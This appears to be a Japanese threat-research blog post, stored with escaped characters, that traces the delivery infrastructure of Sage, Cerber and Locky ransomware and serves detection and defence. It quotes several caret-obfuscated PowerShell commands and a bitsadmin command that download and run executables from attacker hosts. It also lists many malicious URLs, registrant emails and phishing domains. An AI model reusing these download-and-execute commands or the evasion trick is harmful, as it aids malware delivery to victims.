\u3053\u306e\u30d6\u30ed\u30b0\u8a18\u4e8b\u306e\u4e2d\u3067\u3001\u79c1\u306f\u30e9\u30f3\u30b5\u30e0\u30a6\u30a7\u30a2\u306e\u914d\u4fe1\u30a4\u30f3\u30d5\u30e9\u30b9\u30c8\u30e9\u30af\u30c1\u30e3\u3092\u5206\u6790\u3057\u3001\u691c\u77e5\u30fb\u9632\u5fa1\u7528\u306b\u5c0e\u5165\u3059\u308b\u3053\u3068\u306e\u3067\u304d\u308b\u30a4\u30f3\u30b8\u30b1\u30fc\u30bf\u3092\u5217\u6319\u3057\u3066\u884c\u304d\u307e\u3059\u3002\u3057\u304b\u3057\u3001\u30a4\u30f3\u30d5\u30e9\u30b9\u30c8\u30e9\u30af\u30c1\u30e3\u306e\u5206\u6790\u306b\u5165\u308b\u524d\u306b\u3001\u3069\u306e\u3088\u3046\u306b\u3057\u3066\u3053\u306e\u914d\u4fe1\u304c\u767a\u751f\u3059\u308b\u306e\u304b\u624b\u77ed\u306b\u89e3\u8aac\u3059\u308b\u5fc5\u8981\u304c\u3042\u308a\u307e\u3059\u3002<\/p>\n
\u79c1\u304c\u3053\u306e\u3053\u3068\u3092\u767a\u898b\u3057\u305f\u306e\u306f\u3001\u30e9\u30f3\u30b5\u30e0\u30a6\u30a7\u30a2\u305d\u308c\u81ea\u4f53\u304c\u7406\u7531\u3067\u306f\u306a\u304f\u3001Microsoft Word\u6587\u66f8\u304c\u30e9\u30f3\u30b5\u30e0\u30a6\u30a7\u30a2\u306e\u5b9f\u884c\u53ef\u80fd\u30d5\u30a1\u30a4\u30eb\u3092\u30c0\u30a6\u30f3\u30ed\u30fc\u30c9\u3059\u308b\u65b9\u6cd5\u304c\u539f\u56e0\u3067\u3057\u305f\u3002\u5177\u4f53\u7684\u306b\u306f\u3001\u3053\u308c\u3089\u306eMicrosoft Word\u6587\u66f8\u306f\u3001\u3053\u306e\u7a2e\u306e\u30e9\u30f3\u30b5\u30e0\u30a6\u30a7\u30a2\u653b\u6483\u6d3b\u52d5\u3067\u666e\u901a\u306b\u884c\u308f\u308c\u3066\u3044\u308b\u3088\u3046\u306b\u96fb\u5b50\u30e1\u30fc\u30eb\u306b\u3088\u3063\u3066\u914d\u4fe1\u3055\u308c\u3001PowerShell\u30d7\u30ed\u30bb\u30b9\u3092\u8d77\u52d5\u3057\u3066\u3001\u79c1\u304c\u30e2\u30cb\u30bf\u30ea\u30f3\u30b0\u3057\u305f\u56de\u907f\u624b\u6cd5\u3092\u7528\u3044\u3066\u5b9f\u969b\u306e\u30e9\u30f3\u30b5\u30e0\u30a6\u30a7\u30a2\u3092\u30c0\u30a6\u30f3\u30ed\u30fc\u30c9\u3057\u307e\u3059\u3002\u56de\u907f\u624b\u6cd5\u306e\u80cc\u5f8c\u306b\u3042\u308b\u767a\u60f3\u306f\u3001\u30d7\u30ed\u30bb\u30b9\u8d77\u52d5\u3092\u963b\u6b62\u3059\u308b\u30d1\u30bf\u30fc\u30f3 \u30de\u30c3\u30c1\u30f3\u30b0\u307e\u305f\u306f\u6587\u5b57\u5217\u30de\u30c3\u30c1\u30f3\u30b0\u3092\u56de\u907f\u3059\u308b\u3068\u3044\u3046\u3082\u306e\u3067\u3059\u3002\u56de\u907f\u3059\u308b\u306b\u306f\u3001Windows\u306e\u30b3\u30de\u30f3\u30c9\u30e9\u30a4\u30f3\u306e\u30ab\u30e9\u30c3\u30c8('^')\u30a8\u30b9\u30b1\u30fc\u30d7\u6587\u5b57\u3092\u901a\u5e38\u306e\u6587\u5b57\u3068\u6587\u5b57\u306e\u9593\u306b\u5165\u308c\u3066\u3001\u4f8b\u3048\u3070\u201cpowershell\u201d\u3084\u201cexecutionpolicy\u201d\u3068\u3044\u3063\u305f\u30b3\u30de\u30f3\u30c9\u3092\u5206\u5272\u3057\u307e\u3059\u3002\u3053\u306e\u4f8b\u3092\u4ee5\u4e0b\u306b\u793a\u3057\u307e\u3059\u3002<\/p>\n
Windows\\SysWOW64\\cmd.exe , Windows\\System32\\cmd.exe \/C \r\nPoWER^s^h^eL^l.^eX^E -^Ex^Ec^uti^oN^p^o^L^I^C^y^ ^ByPASS^ -\r\nnO^pR^OFiL^e -^Win^DoW^St^YLe^ hiDdEN (^nEw-ObJEc^t \r\n^sys^t^e^m.nE^T.wEBc^l^ieNT^).D^O^WNl^oAd^fi^le^(^'http:\/\/vvorootad.top\/r\r\nead.php?f=0.dat' , 'Users\\Administrator\\AppData\\Roaming.eXe');s^tArT-\r\n^P^ro^C^E^Ss^ 'Users\\Administrator\\AppData\\Roaming.EXe'\r\n<\/pre>\n\u4f8b\u3048\u3070\u201cpowershell\u201d\u3092\u30d6\u30ed\u30c3\u30af\u3057\u3088\u3046\u3068\u3057\u3066\u3082\u3001\u30ab\u30e9\u30c3\u30c8\u304c\u3053\u306e\u5358\u8a9e\u3092\u5206\u5272\u3057\u3066\u3044\u308b\u305f\u3081\u30d6\u30ed\u30c3\u30af\u3067\u304d\u306a\u3044\u3067\u3057\u3087\u3046\u3002\u3057\u304b\u3057\u3001Microsoft Windows\u304c\u5b9f\u969b\u306b\u51e6\u7406\u3059\u308b\u306e\u306b\u4f55\u306e\u5f71\u97ff\u3082\u3042\u308a\u307e\u305b\u3093\u3002Microsoft Word\u6587\u66f8\u306b\u306f\u3001\u3053\u306e\u30b3\u30de\u30f3\u30c9\u3092\u7d44\u307f\u7acb\u3066\u3066\u5b9f\u884c\u3059\u308b\u30de\u30af\u30ed\u304c\u96e3\u8aad\u5316\u3057\u305f\u5f62\u3067\u542b\u307e\u308c\u3066\u304a\u308a\u3001\u30b3\u30de\u30f3\u30c9\u304c\u5b9f\u884c\u3055\u308c\u308b\u3068\u30e9\u30f3\u30b5\u30e0\u30a6\u30a7\u30a2\u306e\u30d5\u30a1\u30a4\u30eb\u304c\u30c0\u30a6\u30f3\u30ed\u30fc\u30c9\u3055\u308c\u5b9f\u884c\u3055\u308c\u307e\u3059\u3002\u4f55\u3082\u96e3\u89e3\u3067\u306f\u3042\u308a\u307e\u305b\u3093\u304c\u3001\u3053\u306e\u6587\u66f8\u306f\u691c\u51fa\u3068\u9632\u5fa1\u3092\u56de\u907f\u3057\u3088\u3046\u3068\u3059\u308b\u3082\u306e\u306e\u3001\u5b9f\u969b\u306e\u3068\u3053\u308d\u4ed6\u3088\u308a\u3082\u76ee\u7acb\u3064\u305f\u3081\u30ea\u30d0\u30fc\u30b9 \u30a8\u30f3\u30b8\u30cb\u30a2\u30ea\u30f3\u30b0\u304c\u52b9\u679c\u7684\u306b\u3067\u304d\u307e\u3059\u3002<\/p>\n
URL\u5185\u306e\u201cread.php?f=0.dat\u201d\u3068\u3044\u3046\u3053\u306e\u30d1\u30b9\u304b\u3089\u5272\u308a\u51fa\u3059\u3068\u3001\u79c1\u306fPalo Alto Networks\u306eAutoFocus<\/a>\u3092\u4f7f\u3063\u30662016\u5e7412\u670815\u65e5\u4ee5\u964d\u306e9,107\u500b\u306e\u4e00\u610f\u7684\u306aMicrosoft Word\u6587\u66f8\u3092\u76f4\u3061\u306b\u7279\u5b9a\u3059\u308b\u3053\u3068\u304c\u3067\u304d\u307e\u3057\u305f\u3002\u3053\u308c\u3089\u306e\u6587\u66f8\u306f\u52d5\u7684\u51e6\u7406\u6d3b\u52d5\u306b\u304a\u3044\u3066\u3053\u306e\u30d1\u30bf\u30fc\u30f3\u3068\u30de\u30c3\u30c1\u3057\u307e\u3057\u305f\u3002\u305d\u3053\u304b\u3089\u3001\u79c1\u306f\u3053\u306e\u653b\u6483\u6d3b\u52d5\u3067\u4f7f\u7528\u3055\u308c\u3066\u3044\u308b\u30c0\u30a6\u30f3\u30ed\u30fc\u30c9\u5834\u6240\u3092\u3001\u7279\u5b9a\u3057\u305f\u30b5\u30f3\u30d7\u30eb\u306e\u4e2d\u304b\u3089\u3059\u3079\u3066\u62bd\u51fa\u3059\u308b\u3053\u3068\u304c\u3067\u304d\u307e\u3057\u305f\u3002<\/p>\n
hxxp:\/\/aloepolera[.]top\/read.php?f=0.dat\r\nhxxp:\/\/aoopoerope[.]top\/read.php?f=0.dat\r\nhxxp:\/\/asecwitlecn[.]bid\/read.php?f=0.dat\r\nhxxp:\/\/cunumlicgaf[.]bid\/read.php?f=0.dat\r\nhxxp:\/\/dosehoop[.]top\/read.php?f=0.dat\r\nhxxp:\/\/errorfola[.]top\/read.php?f=0.dat\r\nhxxp:\/\/folueopa[.]top\/read.php?f=0.dat\r\nhxxp:\/\/fortycooola[.]top\/read.php?f=0.dat\r\nhxxp:\/\/hometowergop[.]top\/read.php?f=0.dat\r\nhxxp:\/\/mondayhelthc[.]top\/read.php?f=0.dat\r\nhxxp:\/\/newfoodas[.]top\/read.php?f=0.dat\r\nhxxp:\/\/newyeargoka[.]top\/read.php?f=0.dat\r\nhxxp:\/\/poooperfath[.]top\/read.php?f=0.dat\r\nhxxp:\/\/ranumseh[.]bid\/read.php?f=0.dat\r\nhxxp:\/\/smoeroota[.]top\/read.php?f=0.dat\r\nhxxp:\/\/sutraponef[.]top\/read.php?f=0.dat\r\nhxxp:\/\/toagoores[.]top\/read.php?f=0.dat\r\nhxxp:\/\/totalonedk[.]top\/read.php?f=0.dat\r\nhxxp:\/\/www.aoopoerope[.]top\/read.php?f=0.dat\r\nhxxp:\/\/www.asecwitlecn[.]bid\/read.php?f=0.dat\r\nhxxp:\/\/www.dandyhomern[.]top\/read.php?f=0.dat\r\nhxxp:\/\/www.ddoeroole[.]top\/read.php?f=0.dat\r\nhxxp:\/\/www.doomgamesoa[.]top\/read.php?f=0.dat\r\nhxxp:\/\/www.johnsnowz[.]top\/read.php?f=0.dat\r\nhxxp:\/\/www.kiselalloe[.]top\/read.php?f=0.dat\r\nhxxp:\/\/www.nnapoakea[.]top\/read.php?f=0.dat\r\nhxxp:\/\/www.qwatrojohn[.]top\/read.php?f=0.dat\r\nhxxp:\/\/www.soonhalia[.]top\/read.php?f=0.dat\r\nhxxp:\/\/zonexxopera[.]top\/read.php?f=0.dat\r\n<\/pre>\n\u767b\u9332\u8005\u306e\u30ec\u30d9\u30eb\u3067\u5185\u5728\u3059\u308b \u76f8\u95a2\u95a2\u4fc2\u304c\u4f55\u304b\u306a\u3044\u304b\u5224\u65ad\u3059\u308b\u305f\u3081\u3001\u7279\u5b9a\u3057\u305f\u3053\u308c\u3089\u306e\u30c9\u30e1\u30a4\u30f3\u3059\u3079\u3066\u306b\u95a2\u3057\u3066WHOIS\u3092\u629c\u304d\u51fa\u3057\u305f\u3068\u3053\u308d\u3001\u3084\u306f\u308a\u65b0\u305f\u306a\u30d1\u30bf\u30fc\u30f3\u304c\u6d6e\u304b\u3073\u4e0a\u304c\u3063\u3066\u304d\u307e\u3057\u305f\u3002<\/p>\n
\u56f31 \u914d\u4fe1\u30c9\u30e1\u30a4\u30f3\u540c\u58eb\u306e\u95a2\u4fc2<\/figcaption><\/figure>\n \u56f31\u306b\u306f\u30015\u3064\u306e\u30c9\u30e1\u30a4\u30f3\u7fa4\u304c\u793a\u3055\u308c\u3066\u3044\u307e\u3059\u3002\u8584\u7dd1\u8272\u306f\u30c9\u30e1\u30a4\u30f3\u3092\u767b\u9332\u3057\u305f\u4eba\u7269\u306e\u540d\u524d\u3092\u8868\u3057\u3001\u6fc3\u3044\u7070\u8272\u306f\u305d\u306e\u4eba\u7269\u306e\u96fb\u5b50\u30e1\u30fc\u30eb\u3092\u8868\u3057\u3066\u3044\u307e\u3059\u3002\u300c\u4eba\u7269\u300d\u3054\u3068\u306b\u3001\u305d\u306e\u30a2\u30a4\u30c7\u30f3\u30c6\u30a3\u30c6\u30a3(ID)\u306b\u95a2\u9023\u4ed8\u3051\u3089\u308c\u305f\u8907\u6570\u306e\u30c9\u30e1\u30a4\u30f3\u304c\u3042\u308a\u307e\u3059\u3002<\/p>\n
deanmcd at mail[.]com\r\ndns at unit.org[.]hk\r\ngalicole at mail[.]com\r\njenniemarc at mail[.]com\r\nlecborbobl at rothtec[.]com\u00a0\r\n<\/pre>\n\u624b\u306b\u3057\u305f\u3053\u306e\u60c5\u5831\u3092\u57fa\u306b\u3001\u96fb\u5b50\u30e1\u30fc\u30eb\u3092\u4f7f\u7528\u3057\u3066\u3001\u5f15\u304d\u7d9a\u304d\u30d4\u30dc\u30c3\u30c8\u691c\u7d22\u3092\u884c\u3044\u3001\u3053\u308c\u3089\u306eID\u306b\u3088\u3063\u3066\u767b\u9332\u3055\u308c\u305f\u3059\u3079\u3066\u306e\u30c9\u30e1\u30a4\u30f3\u3092\u898b\u3064\u3051\u51fa\u3057\u307e\u3057\u305f\u3002\u9a5a\u3044\u305f\u3053\u3068\u306b\u3001\u5408\u8a08574\u306e\u30c9\u30e1\u30a4\u30f3\u304c\u5b58\u5728\u3057\u30019\u3064\u306e\u30c9\u30e1\u30a4\u30f3\u306e\u307f\u3092\u6301\u3064\u201cdns at unit.org[.]hk\u201d\u30a2\u30c9\u30ec\u30b9\u3092\u9664\u304d\u3001ID\u3054\u3068\u306b125\uff5e160\u306e\u30c9\u30e1\u30a4\u30f3\u304c\u3042\u308a\u307e\u3057\u305f\u3002<\/p>\n
\u3053\u3053\u3067\u3001\u3053\u308c\u3089\u306e\u30c9\u30e1\u30a4\u30f3\u306e\u4e00\u90e8\u3092\u3056\u3063\u3068\u898b\u3066\u307f\u308b\u3068\u3001\u30d5\u30a3\u30c3\u30b7\u30f3\u30b0\u307e\u305f\u306f\u56de\u907f\u306e\u3044\u305a\u308c\u304b\u3092\u76ee\u7684\u3068\u3057\u3066\u3001\u4ed6\u306e\u4f1a\u793e\u3068\u3057\u3066\u6210\u308a\u3059\u307e\u3057\u3066\u3044\u308b\u5927\u91cf\u306e\u30c9\u30e1\u30a4\u30f3\u304b\u3089\u5168\u822c\u7684\u306b\u60aa\u610f\u306e\u3042\u308b\u672c\u8cea\u3092\u611f\u3058\u53d6\u308c\u307e\u3059\u3002<\/p>\n
americarneexpress[.]com\r\nbarclaycardsecure[.]de\r\nbarclayscardsecure[.]com\r\ncom-au-netbank[.]top\r\ncommbank-com[.]top\r\nmicrosoftsecuritycheck[.]info\r\nmicrosoftstat[.]in\r\nscotiaonlinescotiabankinstantsupport[.]com\r\nscotiaonlinescotiabankinstantunlock[.]com\r\nscotiaonlinescotiabankinstantupdate[.]com\r\nscotiaonlinescotiabankinstantupdates[.]com\r\nscotiaonlinescotiabankliveupdate[.]com\r\nscotiaonlinescotiabankliveupdates[.]com\r\nscotiaonlinescotiabanksecurityupdates[.]com\r\nscotiaonlinescotiabankservicehelp[.]com\r\nscotiaonlinescotiabanksystemupdate[.]com\r\nscotiaonlinescotiabanksystemupdates[.]com\r\nscotiaonlinescotiabanktechdepartment[.]com\r\nsecurin-gmail[.]com\r\nsecurity-amerilcanexpress[.]online\r\nupdatedmicrosoftoffi1e[.]com\r\nupdatemicrosoftoffi1e[.]com\r\n<\/pre>\n\u3053\u306e\u65b0\u3057\u3044\u30c9\u30e1\u30a4\u30f3\u306e\u30ea\u30b9\u30c8\u3092\u4f7f\u7528\u3057\u3066\u3001AutoFocus\u306b\u623b\u308a\u3001\u3055\u3089\u306b12,422\u4ef6\u306e\u30b5\u30f3\u30d7\u30eb\u3092\u5217\u6319\u3059\u308b\u3053\u3068\u304c\u3067\u304d\u307e\u3057\u305f\u3002\u3059\u3079\u3066\u3001\u4ee5\u524d\u306e\u6587\u66f8\u3068\u540c\u69d8\u306e\u6d3b\u52d5\u3092\u793a\u3057\u3066\u3044\u307e\u3057\u305f\u3002<\/p>\n
\u4ee5\u4e0b\u306f\u3001\u30c0\u30a6\u30f3\u30ed\u30fc\u30c9 \u30b3\u30de\u30f3\u30c9\u3068\u4e00\u610f\u306eURL\u30d1\u30b9\u306e\u5404\u30d0\u30ea\u30a8\u30fc\u30b7\u30e7\u30f3\u306e\u4f8b\u3067\u3059\u3002<\/p>\n
\u201csearch.php\u201d<\/p>\n
Windows\\SysWOW64\\cmd.exe , cMd.eXe \/c pow^ers^He^lL.^exE -\r\nexEC^UTiOnpol^icy^ ^bY^Pa^S^S ^-^NoPr^ofiLE^ -W^INDo^Ws^T^Yle^ \r\nHI^DdEN^ (nEw-obJ^e^C^T^ \r\n^sys^tEM.^nET.W^ebC^LIeNt^)^.dOwN^L^OAD^f^iLE^('http:\/\/sonnystafgy.top\/se\r\narch.php' , ^'%APPDAtA%.eXE');Start^-^p^rO^CeSS '%aPPDATA%.ExE'\r\n\r\nhxxp:\/\/bestflowstou[.]wang\/search.php\r\nhxxp:\/\/bogidoggy[.]top\/search.php\r\nhxxp:\/\/cocalolo[.]top\/search.php\r\nhxxp:\/\/cometogod[.]top\/search.php\r\nhxxp:\/\/dogtosamdnc[.]top\/search.php\r\nhxxp:\/\/dpolly-dolly[.]top\/search.php\r\nhxxp:\/\/flowers-my[.]wang\/search.php\r\nhxxp:\/\/lislissli[.]wang\/search.php\r\nhxxp:\/\/lolotocoporo[.]wang\/search.php\r\nhxxp:\/\/moonshards[.]top\/search.php\r\nhxxp:\/\/panntyplenty[.]top\/search.php\r\nhxxp:\/\/randoz-pandom[.]wang\/search.php\r\nhxxp:\/\/roggistazli[.]top\/search.php\r\nhxxp:\/\/sonnystafgy[.]top\/search.php\r\nhxxp:\/\/sun2u[.]top\/search.php\r\nhxxp:\/\/tolleyfrvdy[.]wang\/search.php\r\nhxxp:\/\/transporingsytw[.]wang\/search.php\r\nhxxp:\/\/travelsserts[.]wang\/search.php\r\nhxxp:\/\/trendsnonstop[.]top\/search.php\r\nhxxp:\/\/truepokemonant[.]top\/search.php\r\nhxxp:\/\/trustedfoevery[.]top\/search.php\r\nhxxp:\/\/trustgovnet[.]top\/search.php\r\nhxxp:\/\/truthforeyoue[.]top\/search.php\r\nhxxp:\/\/zussipussicscds[.]top\/search.php\r\n<\/pre>\n\u201cread.php?f=1.dat\u201d<\/p>\n
Windows\\SysWOW64\\cmd.exe , CmD.eXe \/C pOw^erShELL.^Ex^e ^-\r\neXEC^UTi^OnpO^LiC^y^ BYP^a^sS -NOP^Ro^F^Il^E -w^inDo^w^sTY^Le \r\nH^i^d^de^n ^(N^EW-OBj^e^Ct^ \r\nSysTem.net.wEBcl^ie^n^t^).doWnlOaDF^I^Le('http:\/\/rootaleyz.top\/read.php?f=1.\r\ndat' , ^'%aPpdata%.eXE')^;Star^T^-^pROCE^sS '%ApPDaTa%.eXE'\r\n\r\nhxxp:\/\/rootaleyz[.]top\/read.php?f=1.dat\r\n<\/pre>\n\u201cread.php?f=404\u201d<\/p>\n
Windows\\SysWOW64\\cmd.exe , Cmd.EXE \/C pO^weRshe^l^L.exE ^-\r\nEXecu^T^I^o^n^p^olIcY^ ^BYpASS -n^Op^r^O^f^IlE^ ^-W^i^NDo^WStY^LE \r\nhIdd^en^ (^NE^W^-OBJ^ECT^ \r\nsySt^Em^.^N^et.^weBClieNt).dO^W^N^lOAdFil^e(^'http:\/\/doconlineaof.top\/read.\r\nphp?f=404' , '%APPDAta%.exE')^;^STA^r^t-p^RO^ceSs^ '%AppdATA%.exE'\r\n\r\nhxxp:\/\/doconlineaof[.]top\/read.php?f=404\r\nhxxp:\/\/doclosegoa[.]top\/read.php?f=404\r\nhxxp:\/\/fooperight[.]top\/read.php?f=404\r\nhxxp:\/\/mondayhelthc[.]top\/read.php?f=404\r\nhxxp:\/\/qopahighk[.]top\/read.php?f=404\r\n<\/pre>\n\u201cadmin.php?f=0.dat\u201d<\/p>\n
Windows\\SysWOW64\\cmd.exe , Windows\\System32\\cmd.exe \/C \r\nP^Ow^Ers^HEL^l.eX^E -e^X^Ecuti^ONPOlIc^Y BY^PAsS^ -Noprof^Il^e^ -\r\nw^iNDo^W^styLE hIDD^E^N ^(New-o^bJE^Ct^ \r\n^SYSTEm.net.w^eb^cLIenT).^dOwnloA^dfI^le('http:\/\/coolzeropa.top\/admin.php?f\r\n=0.dat' , ^'Users\\Administrator\\AppData\\Roaming.eXe');St^ar^T^-Pr^oC^esS \r\n'Users\\Administrator\\AppData\\Roaming.ExE'\r\n\r\nhxxp:\/\/coolzeropa[.]top\/admin.php?f=0.dat\r\nhxxp:\/\/fooperight[.]top\/admin.php?f=0.dat\r\n<\/pre>\n\u201cadmin.php?f=1.jpg\u201d<\/p>\n
Windows\\SysWOW64\\cmd.exe , Windows\\System32\\cmd.exe \/c \r\nPOw^ErSHEL^l^.^E^xE -^eXe^CUtiONp^OLi^cY b^yPASs^ -Nop^R^OFILe^ -\r\n^WInd^oWstyLe hIDD^eN^ (^neW-oB^jE^C^t \r\n^s^Y^StEm.^nEt.wE^BcLIEnt^).^DOWNloadfILE(^'http:\/\/www.hometowergop.top\r\n\/admin.php?f=1.jpg' , 'Users\\Administrator\\AppData\\Roaming.exe')^;STa^RT-\r\npr^O^c^e^sS^ 'Users\\Administrator\\AppData\\Roaming.EXe'\r\n\r\nhxxp:\/\/www.hometowergop[.]top\/admin.php?f=1.jpg\r\n<\/pre>\n\u3053\u306e\u6b21\u306e\u3082\u306e\u306f\u3001Sage\u3084Cerber\u3067\u306f\u306a\u304f\u3001Locky\u3092\u4f7f\u7528\u3057\u3066\u3044\u305f\u305f\u3081\u7279\u306b\u8208\u5473\u304c\u60f9\u304b\u308c\u307e\u3057\u305f\u3002\u3053\u306e\u6700\u521d\u306e\u30a4\u30f3\u30b9\u30bf\u30f3\u30b9\u306f\u3001\u3053\u306e\u8a18\u4e8b\u3067\u8aac\u660e\u3057\u305fSage\u304a\u3088\u3073Cerber\u653b\u6483\u6d3b\u52d5\u306e6\u65e5\u524d\u300112\u67089\u65e5\u306b\u958b\u59cb\u3055\u308c\u307e\u3057\u305f\u3002<\/p>\n
\u6ce8\u610f\u3059\u3079\u304d\u3082\u30461\u3064\u306e\u70b9\u306f\u3001\u305d\u308c\u304c\u7570\u306a\u308bPowerShell\u30b3\u30de\u30f3\u30c9\u3092\u4f7f\u7528\u3057\u3066\u3044\u308b\u304c\u3001\u305d\u306e\u80cc\u5f8c\u306b\u3044\u308b\u653b\u6483\u8005\u306f\u30c0\u30a6\u30f3\u30ed\u30fc\u30c9\u6642\u306b\u5f15\u304d\u7d9a\u304d\u201cread.php?f=X.dat\u201d\u5f62\u5f0f\u3092\u4f7f\u7528\u3057\u3066\u3044\u305f\u3053\u3068\u3067\u3059\u3002<\/p>\n
\u201cread.php?f=3.dat\u201d<\/p>\n
WINDOWS\\system32\\cmd.exe , cmd \/c powershell Foreach($url in\r\n@({http:\/\/tomyyplayde.com\/read.php?f=3.dat})){try{$path = \r\n'%tmp%\\35898.exe';(New-Object \r\nSystem.Net.WebClient).DownloadFile($url.ToString() , $path);Start-Process \r\n$path;break;}catch{}}\r\n\r\nhxxp:\/\/tomyyplayde[.]com\/read.php?f=3.dat\r\n<\/pre>\n\u5927\u4e8b\u306a\u3053\u3068\u3092\u8a00\u3044\u5fd8\u308c\u3066\u3044\u307e\u3057\u305f\u304c\u3001\u30e9\u30f3\u30b5\u30e0\u30a6\u30a7\u30a2\u3092\u30c0\u30a6\u30f3\u30ed\u30fc\u30c9\u3059\u308b\u305f\u3081\u306b\u3055\u3089\u306b\u5225\u306e\u30d0\u30fc\u30b8\u30e7\u30f3\u3092\u4f7f\u7528\u3057\u305f\u30012016\u5e748\u67086\u65e5\u306b\u958b\u59cb\u3055\u308c\u305f\u30b5\u30f3\u30d7\u30eb\u304c\u3042\u308a\u307e\u3057\u305f\u3002\u3053\u308c\u306f\u3001PowerShell\u3067\u306f\u306a\u304fBITS\u3092\u4f7f\u7528\u3057\u3066\u30d5\u30a1\u30a4\u30eb\u3092\u8ee2\u9001\u3057\u3001\u3088\u308a\u65b0\u3057\u3044\u30d0\u30fc\u30b8\u30e7\u30f3\u3067\u898b\u3089\u308c\u308b\u5b9f\u884c\u53ef\u80fd\u30d5\u30a1\u30a4\u30eb\u306e\u201cexe\u201d\u62e1\u5f35\u5b50\u306e\u4ee3\u308f\u308a\u306b\u30b9\u30af\u30ea\u30fc\u30f3\u30bb\u30fc\u30d0\u30fc\u306e\u62e1\u5f35\u5b50\u201cscr\u201d\u3092\u4ed8\u3051\u3066\u30d5\u30a1\u30a4\u30eb\u3092\u30c9\u30ed\u30c3\u30d7\u3057\u307e\u3059\u3002<\/p>\n
\u201cadmin.php?f=1.exe\u201d<\/p>\n
Windows\\SysWOW64\\bitsadmin.exe , bitsadmin \/transfer myjob \/download \r\n\/priority high http:\/\/1topfllrt.top\/admin.php?f=1.exe \r\nUsers\\Administrator\\AppData\\Roaming\\734g34.scr\r\n\r\nhxxp:\/\/1topfllrt[.]top\/admin.php?f=1.exe\r\n<\/pre>\n\u52d5\u7684\u5206\u6790\u30ec\u30dd\u30fc\u30c8\u3067\u30d5\u30a1\u30a4\u30eb\u3068\u30b9\u30af\u30ec\u30a4\u30d4\u30f3\u30b0\u3055\u308c\u305f\u30c7\u30fc\u30bf\u3092\u7dbf\u5bc6\u306b\u8abf\u3079\u305f\u5f8c\u3001\u3053\u306e\u653b\u6483\u6d3b\u52d5\u306e\u80cc\u5f8c\u306b\u3044\u308b\u653b\u6483\u8005\u304c\u597d\u3093\u30671\u3064\u306e\u30d1\u30bf\u30fc\u30f3\u306b\u5f93\u3063\u3066\u3044\u308b\u3053\u3068\u304c\u660e\u3089\u304b\u306b\u306a\u308a\u307e\u3057\u305f\u3002\u30e9\u30f3\u30b5\u30e0\u30a6\u30a7\u30a2\u306e\u4e9c\u7a2e\u306b\u95a2\u4fc2\u306a\u304f\u3001\u3053\u308c\u3089\u306e\u5c0f\u3055\u306a\u75d5\u8de1\u306b\u3088\u3063\u3066\u3001\u3088\u308a\u5927\u898f\u6a21\u306a\u30a4\u30f3\u30d5\u30e9\u30b9\u30c8\u30e9\u30af\u30c1\u30e3\u3092\u89e3\u660e\u3057\u3001\u73fe\u5728\u304a\u3088\u3073\u8003\u3048\u3089\u308c\u308b\u5c06\u6765\u306e\u8105\u5a01\u306b\u95a2\u3059\u308b\u3088\u308a\u5b9f\u7528\u7684\u306a\u30c7\u30fc\u30bf\u3092\u751f\u6210\u3059\u308b\u3053\u3068\u304c\u3067\u304d\u307e\u3059\u3002<\/p>\n
Palo Alto Networks\u306e\u304a\u5ba2\u69d8\u306f\u3001\u6b21\u306e\u65b9\u6cd5\u3067\u8105\u5a01\u304b\u3089\u4fdd\u8b77\u3055\u308c\u3066\u3044\u307e\u3059\u3002<\/p>\n
\u3053\u306e\u30de\u30eb\u30a6\u30a7\u30a2\u3092\u914d\u4fe1\u3059\u308b\u305f\u3081\u306b\u4f7f\u7528\u3055\u308c\u305f\u30c9\u30e1\u30a4\u30f3\u3068\u3001\u95a2\u9023\u3059\u308b\u653b\u6483\u3067\u4f7f\u7528\u3055\u308c\u305f\u30c9\u30e1\u30a4\u30f3\u306f\u3001\u8105\u5a01\u9632\u5fa1\u3092\u901a\u3058\u3066\u30d6\u30ed\u30c3\u30af\u3055\u308c\u307e\u3059\u3002<\/p>\n
WildFire\u306f\u3001\u3053\u308c\u3089\u306e\u624b\u6cd5\u3092\u4f7f\u7528\u3057\u3066\u3044\u308b\u30d5\u30a1\u30a4\u30eb\u3092\u60aa\u610f\u306e\u3042\u308b\u3082\u306e\u3068\u3057\u3066\u8b58\u5225\u3057\u307e\u3059\u3002<\/p>\n
AutoFocus\u30e6\u30fc\u30b6\u30fc\u306f\u3001PowerShellCaretObfuscation<\/a>\u304a\u3088\u3073CerberSage_Distribution<\/a>\u3092\u4f7f\u7528\u3057\u3066\u3001\u95a2\u9023\u3059\u308b\u6d3b\u52d5\u3092\u8b58\u5225\u3067\u304d\u307e\u3059\u3002<\/p>\n
\u4ee5\u4e0b\u306f\u3001\u691c\u51fa\u3068\u9632\u5fa1\u306b\u4f7f\u7528\u3067\u304d\u308b\u75d5\u8de1\u306e\u8981\u7d04\u3067\u3059\u3002<\/p>\n
\u5217\u6319\u3055\u308c\u305f\u30d1\u30b9:<\/p>\n
admin.php?f=0.dat\r\nadmin.php?f=1.exe\r\nadmin.php?f=1.jpg\r\nread.php?f=0.dat\r\nread.php?f=1.dat\r\nread.php?f=3.dat\r\nread.php?f=404\r\nsearch.php \r\n<\/pre>\n\u76f4\u63a5\u7684\u306a\u30e9\u30f3\u30b5\u30e0\u30a6\u30a7\u30a2 \u30c0\u30a6\u30f3\u30ed\u30fc\u30c9URL:<\/p>\n
hxxp:\/\/aloepolera[.]top\/read.php?f=0.dat\r\nhxxp:\/\/aoopoerope[.]top\/read.php?f=0.dat\r\nhxxp:\/\/asecwitlecn[.]bid\/read.php?f=0.dat\r\nhxxp:\/\/cunumlicgaf[.]bid\/read.php?f=0.dat\r\nhxxp:\/\/dosehoop[.]top\/read.php?f=0.dat\r\nhxxp:\/\/errorfola[.]top\/read.php?f=0.dat\r\nhxxp:\/\/folueopa[.]top\/read.php?f=0.dat\r\nhxxp:\/\/fortycooola[.]top\/read.php?f=0.dat\r\nhxxp:\/\/hometowergop[.]top\/read.php?f=0.dat\r\nhxxp:\/\/mondayhelthc[.]top\/read.php?f=0.dat\r\nhxxp:\/\/newfoodas[.]top\/read.php?f=0.dat\r\nhxxp:\/\/newyeargoka[.]top\/read.php?f=0.dat\r\nhxxp:\/\/poooperfath[.]top\/read.php?f=0.dat\r\nhxxp:\/\/ranumseh[.]bid\/read.php?f=0.dat\r\nhxxp:\/\/smoeroota[.]top\/read.php?f=0.dat\r\nhxxp:\/\/sutraponef[.]top\/read.php?f=0.dat\r\nhxxp:\/\/toagoores[.]top\/read.php?f=0.dat\r\nhxxp:\/\/totalonedk[.]top\/read.php?f=0.dat\r\nhxxp:\/\/www.aoopoerope[.]top\/read.php?f=0.dat\r\nhxxp:\/\/www.asecwitlecn[.]bid\/read.php?f=0.dat\r\nhxxp:\/\/www.dandy